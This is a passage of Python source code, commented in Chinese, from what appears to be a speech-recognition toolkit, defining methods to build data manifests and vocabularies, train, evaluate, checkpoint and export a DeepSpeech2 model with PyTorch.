""" PPASR集成工具类 :param use_model: 所使用的模型 :param feature_method: 所使用的预处理方法 :param mean_std_path: 数据集的均值和标准值的npy文件路径 :param train_manifest: 训练数据的数据列表路径 :param test_manifest: 测试数据的数据列表路径 :param dataset_vocab: 数据字典的路径 :param num_workers: 读取数据的线程数量 :param alpha: 集束搜索的LM系数 :param beta: 集束搜索的WC系数 :param beam_size: 集束搜索的大小,范围:[5, 500] :param num_proc_bsearch: 集束搜索方法使用CPU数量 :param cutoff_prob: 剪枝的概率 :param cutoff_top_n: 剪枝的最大值 :param metrics_type: 计算错误方法 :param decoder: 结果解码方法,支持ctc_beam_search和ctc_greedy :param lang_model_path: 语言模型文件路径 """ self.use_model = use_model self.feature_method = feature_method self.mean_std_path = mean_std_path self.train_manifest = train_manifest self.test_manifest = test_manifest self.dataset_vocab = dataset_vocab if platform.system().lower() == 'windows': self.num_workers = 0 print('[{}] Windows系统不支持多线程读取数据,已自动关闭!'.format(datetime.now()), file=sys.stderr) else: self.num_workers = num_workers self.alpha = alpha self.beta = beta self.beam_size = beam_size self.num_proc_bsearch = num_proc_bsearch self.cutoff_prob = cutoff_prob self.cutoff_top_n = cutoff_top_n self.decoder = decoder self.metrics_type = metrics_type self.lang_model_path = lang_model_path self.beam_search_decoder = None def create_data(self, annotation_path='dataset/annotation/', noise_manifest_path='dataset/manifest.noise', noise_path='dataset/audio/noise', num_samples=1000000, count_threshold=2, is_change_frame_rate=True, max_test_manifest=10000): """ 创建数据列表和词汇表 :param annotation_path: 标注文件的路径 :param noise_manifest_path: 噪声数据列表的路径 :param noise_path: 噪声音频存放的文件夹路径 :param num_samples: 用于计算均值和标准值得音频数量,当为-1使用全部数据 :param count_threshold: 字符计数的截断阈值,0为不做限制 :param is_change_frame_rate: 是否统一改变音频为16000Hz,这会消耗大量的时间 :param max_test_manifest: 生成测试数据列表的最大数量,如果annotation_path包含了test.txt,就全部使用test.txt的数据 """ print('开始生成数据列表...') create_manifest(annotation_path=annotation_path, train_manifest_path=self.train_manifest, test_manifest_path=self.test_manifest, is_change_frame_rate=is_change_frame_rate, max_test_manifest=max_test_manifest) print('=' * 70) print('开始生成噪声数据列表...') create_noise(path=noise_path, noise_manifest_path=noise_manifest_path, is_change_frame_rate=is_change_frame_rate) print('=' * 70) print('开始生成数据字典...') counter = Counter() count_manifest(counter, self.train_manifest) count_sorted = sorted(counter.items(), key=lambda x: x[1], reverse=True) with open(self.dataset_vocab, 'w', encoding='utf-8') as fout: fout.write('<blank>\t-1\n') for char, count in count_sorted: if char == ' ': char = '<space>' # 跳过指定的字符阈值,超过这大小的字符都忽略 if count < count_threshold: break fout.write('%s\t%d\n' % (char, count)) print('数据字典生成完成!') print('=' * 70) print('开始抽取{}条数据计算均值和标准值...'.format(num_samples)) compute_mean_std(feature_method=self.feature_method, manifest_path=self.train_manifest, output_path=self.mean_std_path, num_samples=num_samples, num_workers=self.num_workers) def evaluate(self, batch_size=32, min_duration=0, max_duration=-1, resume_model='models/deepspeech2/best_model/'): """ 评估模型 :param batch_size: 评估的批量大小 :param min_duration: 过滤最短的音频长度 :param max_duration: 过滤最长的音频长度,当为-1的时候不限制长度 :param resume_model: 所使用的模型 :return: 评估结果 """ # 获取测试数据 test_dataset = MASRDataset(data_list=self.test_manifest, vocab_filepath=self.dataset_vocab, mean_std_filepath=self.mean_std_path, feature_method=self.feature_method) test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, collate_fn=collate_fn, num_workers=self.num_workers) # 获取模型 if self.use_model == 'deepspeech2': model = DeepSpeech2Model(feat_size=test_dataset.feature_dim, vocab_size=test_dataset.vocab_size) else: raise Exception('没有该模型:{}'.format(self.use_model)) assert os.path.exists(os.path.join(resume_model, 'model.pt')), "模型不存在!" model.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt'))) model.eval() c = [] for inputs, labels, input_lens, _ in tqdm(test_loader): # 执行识别 outs, out_lens, _ = model(inputs, input_lens) outs = torch.nn.functional.softmax(outs, 2) # 解码获取识别结果 outs = outs.cpu().detach().numpy() out_strings = self.decoder_result(outs, out_lens, test_dataset.vocab_list) labels_str = labels_to_string(labels.numpy(), test_dataset.vocab_list) for out_string, label in zip(*(out_strings, labels_str)): # 计算字错率或者词错率 if self.metrics_type == 'wer': c.append(wer(out_string, label)) else: c.append(cer(out_string, label)) cer_result = float(sum(c) / len(c)) return cer_result def train(self, batch_size=32, min_duration=0.5, max_duration=20, num_epoch=50, learning_rate=5e-5, save_model_path='models/', resume_model=None, pretrained_model=None, augment_conf_path='conf/augmentation.json'): """ 训练模型 :param batch_size: 训练的批量大小 :param min_duration: 过滤最短的音频长度 :param max_duration: 过滤最长的音频长度,当为-1的时候不限制长度 :param num_epoch: 训练的轮数 :param learning_rate: 初始学习率的大小 :param save_model_path: 模型保存的路径 :param resume_model: 恢复训练,当为None则不使用预训练模型 :param pretrained_model: 预训练模型的路径,当为None则不使用预训练模型 :param augment_conf_path: 数据增强的配置文件,为json格式 """ # 获取有多少张显卡训练 nranks = torch.cuda.device_count() local_rank = 0 if nranks > 1: # 初始化NCCL环境 dist.init_process_group(backend='nccl') local_rank = dist.get_rank() if local_rank == 0: # 日志记录器 writer = LogWriter(logdir='log') # 获取训练数据 if augment_conf_path is not None and os.path.exists(augment_conf_path): augmentation_config = io.open(augment_conf_path, mode='r', encoding='utf8').read() else: if augment_conf_path is not None and not os.path.exists(augment_conf_path): print('[{}] 数据增强配置文件{}不存在'.format(datetime.now(), augment_conf_path), file=sys.stderr) augmentation_config = '{}' train_dataset = MASRDataset(data_list=self.train_manifest, vocab_filepath=self.dataset_vocab, feature_method=self.feature_method, mean_std_filepath=self.mean_std_path, min_duration=min_duration, max_duration=max_duration, augmentation_config=augmentation_config) # 设置支持多卡训练 if nranks > 1: train_batch_sampler = DSElasticDistributedSampler(train_dataset, batch_size=batch_size, sortagrad=True, drop_last=True, shuffle=True) else: train_batch_sampler = DSRandomSampler(train_dataset, batch_size=batch_size, sortagrad=True, drop_last=True, shuffle=True) train_loader = DataLoader(dataset=train_dataset, collate_fn=collate_fn, batch_sampler=train_batch_sampler, num_workers=self.num_workers) # 获取测试数据 test_dataset = MASRDataset(data_list=self.test_manifest, vocab_filepath=self.dataset_vocab, feature_method=self.feature_method, mean_std_filepath=self.mean_std_path, min_duration=min_duration, max_duration=max_duration) test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, collate_fn=collate_fn, num_workers=self.num_workers) # 获取模型 if self.use_model == 'deepspeech2': model = DeepSpeech2Model(feat_size=train_dataset.feature_dim, vocab_size=train_dataset.vocab_size) else: raise Exception('没有该模型:{}'.format(self.use_model)) # 设置优化方法 optimizer = torch.optim.AdamW(params=model.parameters(), lr=learning_rate, weight_decay=1e-6) torch.cuda.set_device(local_rank) model.cuda(local_rank) if nranks > 1: model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[local_rank]) print('[{}] 训练数据:{}'.format(datetime.now(), len(train_dataset))) # 加载预训练模型 if pretrained_model is not None: assert os.path.exists(os.path.join(pretrained_model, 'model.pt')), "模型参数文件不存在!" pretrained_dict = torch.load(os.path.join(pretrained_model, 'model.pt')) model_dict = model.state_dict() # 将pretrained_dict里不属于model_dict的键剔除掉 pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict} model_dict.update(pretrained_dict) model.load_state_dict(model_dict) print('[{}] 成功加载预训练模型:{}'.format(datetime.now(), pretrained_model)) # 加载恢复模型 last_epoch = -1 last_model_dir = os.path.join(save_model_path, self.use_model, 'last_model') if resume_model is not None or (os.path.exists(os.path.join(last_model_dir, 'model.pt')) and os.path.exists(os.path.join(last_model_dir, 'optimizer.pt'))): # 自动获取最新保存的模型 if resume_model is None: resume_model = last_model_dir assert os.path.exists(os.path.join(resume_model, 'model.pt')), "模型参数文件不存在!" assert os.path.exists(os.path.join(resume_model, 'optimizer.pt')), "优化方法参数文件不存在!" if nranks > 1: model.module.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt'))) else: model.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt'))) optimizer.load_state_dict(torch.load(os.path.join(resume_model, 'optimizer.pt'))) with open(os.path.join(resume_model, 'model.state'), 'r', encoding='utf-8') as f: last_epoch = json.load(f)['last_epoch'] - 1 print('[{}] 成功恢复模型参数和优化方法参数:{}'.format(datetime.now(), resume_model)) scheduler = StepLR(optimizer, step_size=1, gamma=0.93, last_epoch=last_epoch) # 获取损失函数 ctc_loss = torch.nn.CTCLoss(reduction='none', zero_infinity=True) test_step, train_step = 0, 0 best_test_cer = 1 train_times = [] sum_batch = len(train_loader) * num_epoch if local_rank == 0: writer.add_scalar('Train/lr', scheduler.get_last_lr()[0], last_epoch) try: # 开始训练 for epoch in range(last_epoch, num_epoch): epoch += 1 start_epoch = time.time() start = time.time() for batch_id, (inputs, labels, input_lens, label_lens) in enumerate(train_loader): inputs = inputs.cuda() labels = labels.cuda() out, out_lens, _ = model(inputs, input_lens) out = out.log_softmax(2) out = out.permute(1, 0, 2) # 计算损失 label_lens = label_lens.cuda() loss = ctc_loss(out, labels, out_lens, label_lens) loss = loss.mean() loss.backward() optimizer.step() optimizer.zero_grad() train_times.append((time.time() - start) * 1000) # 多卡训练只使用一个进程打印 if batch_id % 100 == 0 and local_rank == 0: eta_sec = (sum(train_times) / len(train_times)) * ( sum_batch - (epoch - 1) * len(train_loader) - batch_id) eta_str = str(timedelta(seconds=int(eta_sec / 1000))) print( '[{}] Train epoch: [{}/{}], batch: [{}/{}], loss: {:.5f}, learning rate: {:>.8f}, eta: {}'.format( datetime.now(), epoch, num_epoch, batch_id, len(train_loader), loss.cpu().detach().numpy(), scheduler.get_last_lr()[0], eta_str)) writer.add_scalar('Train/Loss', loss.cpu().detach().numpy(), train_step) train_step += 1 train_times = [] # 固定步数也要保存一次模型 if batch_id % 10000 == 0 and batch_id != 0 and local_rank == 0: if nranks > 1: self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch, model=model.module, optimizer=optimizer) else: self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch, model=model, optimizer=optimizer) start = time.time() # 多卡训练只使用一个进程执行评估和保存模型 if local_rank == 0: # 执行评估 model.eval() print('\n', '=' * 70) c, l = self.__test(model, test_loader, test_dataset.vocab_list, ctc_loss) print('[{}] Test epoch: {}, time/epoch: {}, loss: {:.5f}, cer: {:.5f}'.format( datetime.now(), epoch, str(timedelta(seconds=(time.time() - start_epoch))), l, c)) print('=' * 70, '\n') writer.add_scalar('Test/Cer', c, test_step) writer.add_scalar('Test/Loss', l, test_step) test_step += 1 model.train() # 记录学习率 writer.add_scalar('Train/lr', scheduler.get_last_lr()[0], epoch) # 保存最优模型 if c <= best_test_cer: best_test_cer = c if nranks > 1: self.save_model(save_model_path=save_model_path, use_model=self.use_model, model=model.module, optimizer=optimizer, epoch=epoch, error_type=self.metrics_type, error_rate=c, test_loss=l, best_model=True) else: self.save_model(save_model_path=save_model_path, use_model=self.use_model, model=model, optimizer=optimizer, epoch=epoch, error_type=self.metrics_type, error_rate=c, test_loss=l, best_model=True) # 保存模型 if nranks > 1: self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch, model=model.module, error_type=self.metrics_type, error_rate=c, test_loss=l, optimizer=optimizer) else: self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch, model=model, error_type=self.metrics_type, error_rate=c, test_loss=l, optimizer=optimizer) scheduler.step() except KeyboardInterrupt: # Ctrl+C退出时保存模型 if local_rank == 0: print('请等一下,正在保存模型...') if nranks > 1: self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch, model=model.module, optimizer=optimizer) else: self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch, model=model, optimizer=optimizer) # 评估模型 @torch.no_grad() def __test(self, model, test_loader, vocabulary, ctc_loss): cer_result, test_loss = [], [] for batch_id, (inputs, labels, input_lens, label_lens) in enumerate(test_loader): inputs = inputs.cuda() labels = labels.cuda() # 执行识别 outs, out_lens, _ = model(inputs, input_lens) out = outs.permute(1, 0, 2) # 计算损失 loss = ctc_loss(out.log_softmax(2), labels, out_lens, label_lens) loss = loss.mean().cpu().detach().numpy() test_loss.append(loss) # 解码获取识别结果 outs = torch.nn.functional.softmax(outs, 2) outs = outs.cpu().detach().numpy() out_strings = self.decoder_result(outs, out_lens, vocabulary) labels_str = labels_to_string(labels.cpu().detach().numpy(), vocabulary) cer_batch = [] for out_string, label in zip(*(out_strings, labels_str)): # 计算字错率或者词错率 if self.metrics_type == 'wer': c = wer(out_string, label) else: c = cer(out_string, label) cer_result.append(c) cer_batch.append(c) if batch_id % 10 == 0: print('[{}] Test batch: [{}/{}], loss: {:.5f}, ' '{}: {:.5f}'.format(datetime.now(), batch_id, len(test_loader),loss,self.metrics_type, float(sum(cer_batch) / len(cer_batch)))) cer_result = float(sum(cer_result) / len(cer_result)) test_loss = float(sum(test_loss) / len(test_loss)) return cer_result, test_loss # 保存模型 @staticmethod def save_model(save_model_path, use_model, epoch, model, optimizer, error_type='cer', error_rate=-1., test_loss=-1., best_model=False): if not best_model: model_path = os.path.join(save_model_path, use_model, 'epoch_{}'.format(epoch)) os.makedirs(model_path, exist_ok=True) torch.save(optimizer.state_dict(), os.path.join(model_path, 'optimizer.pt')) torch.save(model.state_dict(), os.path.join(model_path, 'model.pt')) with open(os.path.join(model_path, 'model.state'), 'w', encoding='utf-8') as f: f.write('{"last_epoch": %d, "test_%s": %f, "test_loss": %f}' % (epoch, error_type, error_rate, test_loss)) last_model_path = os.path.join(save_model_path, use_model, 'last_model') shutil.rmtree(last_model_path, ignore_errors=True) shutil.copytree(model_path, last_model_path) # 删除旧的模型 old_model_path = os.path.join(save_model_path, use_model, 'epoch_{}'.format(epoch - 3)) if os.path.exists(old_model_path): shutil.rmtree(old_model_path) else: model_path = os.path.join(save_model_path, use_model, 'best_model') os.makedirs(model_path, exist_ok=True) torch.save(model.state_dict(), os.path.join(model_path, 'model.pt')) torch.save(optimizer.state_dict(), os.path.join(model_path, 'optimizer.pt')) with open(os.path.join(model_path, 'model.state'), 'w', encoding='utf-8') as f: f.write('{"last_epoch": %d, "test_%s": %f, "test_loss": %f}' % (epoch, error_type, error_rate, test_loss)) print('[{}] 已保存模型:{}'.format(datetime.now(), model_path)) def decoder_result(self, outs, outs_lens, vocabulary): # 集束搜索方法的处理 if self.decoder == "ctc_beam_search" and self.beam_search_decoder is None: try: from masr.decoders.beam_search_decoder import BeamSearchDecoder self.beam_search_decoder = BeamSearchDecoder(self.alpha, self.beta, self.lang_model_path, vocabulary) except ModuleNotFoundError: print('\n==================================================================', file=sys.stderr) print('缺少 paddlespeech-ctcdecoders 库,请根据文档安装,如果是Windows系统,只能使用ctc_greedy。', file=sys.stderr) print('【注意】已自动切换为ctc_greedy解码器。', file=sys.stderr) print('==================================================================\n', file=sys.stderr) self.decoder = 'ctc_greedy' # 执行解码 outs = [outs[i, :l, :] for i, l in enumerate(outs_lens)] if self.decoder == 'ctc_greedy': result = greedy_decoder_batch(outs, vocabulary) else: result = self.beam_search_decoder.decode_batch_beam_search(probs_split=outs, beam_alpha=self.alpha, beam_beta=self.beta, beam_size=self.beam_size, cutoff_prob=self.cutoff_prob, cutoff_top_n=self.cutoff_top_n, vocab_list=vocabulary, num_processes=self.num_proc_bsearch) return result def export(self, save_model_path='models/', resume_model='models/deepspeech2/best_model/'): """ 导出预测模型 :param save_model_path: 模型保存的路径 :param resume_model: 准备转换的模型路径 :return: """ # 获取训练数据 audio_featurizer = AudioFeaturizer(feature_method=self.feature_method) text_featurizer = TextFeaturizer(self.dataset_vocab) featureNormalizer = FeatureNormalizer(mean_std_filepath=self.mean_std_path, feature_method=self.feature_method) # 获取模型 if self.use_model == 'deepspeech2': base_model = DeepSpeech2Model(feat_size=audio_featurizer.feature_dim, vocab_size=text_featurizer.vocab_size) else: raise Exception('没有该模型:{}'.format(self.use_model)) # 加载预训练模型 resume_model_path = os.path.join(resume_model, 'model.pt') assert os.path.exists(resume_model_path), "恢复模型不存在!" base_model.load_state_dict(torch.load(resume_model_path)) print('[{}] 成功恢复模型参数和优化方法参数:{}'.format(datetime.now(), resume_model_path)) base_model.to('cuda') mean = torch.from_numpy(featureNormalizer.mean).float().cuda() std = torch.from_numpy(featureNormalizer.std).float().cuda() # 获取模型 if self.use_model == 'deepspeech2': model = DeepSpeech2ModelExport(model=base_model, feature_mean=mean, feature_std=std) else: raise Exception('没有该模型:{}'.format(self.use_model)) infer_model_dir = os.path.join(save_model_path, self.use_model) os.makedirs(infer_model_dir, exist_ok=True) infer_model_path = os.path.join(infer_model_dir, 'inference.pt') # script_model = torch.jit.trace(model, (torch.rand((1, audio_featurizer.feature_dim, 300)), # torch.randint(high=100, size=(1,), dtype=torch.int32), # torch.rand(size=(base_model.num_rnn_layers, 1, base_model.rnn_size), # dtype=torch.float32))) # torch.jit.save(script_model, infer_model_path) torch.save(model, infer_model_path) print("预测模型已保存:{}".format(infer_model_path)) ```